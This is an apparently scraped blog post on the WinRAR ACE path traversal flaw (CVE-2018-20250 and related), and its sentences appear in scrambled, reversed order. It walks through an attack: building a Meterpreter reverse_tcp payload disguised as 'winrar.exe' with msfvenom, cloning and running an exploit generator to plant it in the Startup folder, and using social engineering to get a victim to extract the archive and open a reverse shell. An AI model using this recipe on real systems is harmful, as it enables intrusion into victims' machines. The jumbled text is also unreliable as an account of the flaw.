Once the victim extracts the malicious rar file “evil.rar,” our winrar.exe backdoor will extract from the startup program. There is currently no startup program in the target machine as shown below. Now use social engineering for transferring the malicious rar to the victim and wait for the victim to restart his machine to obtain reverse connection of the target. evilWinRAR.py -e winrar.exe -g winrar.txtĪs said, this vulnerability allows us to extract the malicious file in the arbitrary path, with the help of this script we will allow rar files extraction in the /startup program.
#The used vulnerable rar archive
Then execute evilWinrar python script along with malicious exe file and text file, creating a malicious archive that you can send to the target. Now create a text file that will display to the victim when he extracts the rar file to confuse him. Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe
#The used vulnerable rar full
git clone ///manulqwerty/Evil-WinRAR-Gen.gitįurther, you need to give full permission to the python script inside the Evil-Winrar-Gen folder and then generate a malicious exe file with the help of msfvenom and name as “winrar.exe” as shown and multi handler inside Metasploit.
#The used vulnerable rar install
Once you download the python script, install the dependency required for it. Let’s download a python script that will generate a malicious file archive in a rar format. This happens due to improper compilation when unace.dll come into the face. When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). The winrar uses the ACE format to compress the folder and unpack the compressed folder with the help of UNACE.DLL. This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR.
The vulnerability identified last year by affects all versions released in all WinRAR over the past 19 years.ĬVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253 In this post, we are going to discuss how WinRAR has patched serious security faults last month, one of the world’s most popular Windows file compression applications, which can only be exploited by tricking a WinRar user to extract malicious archives.
0 kommentar(er)
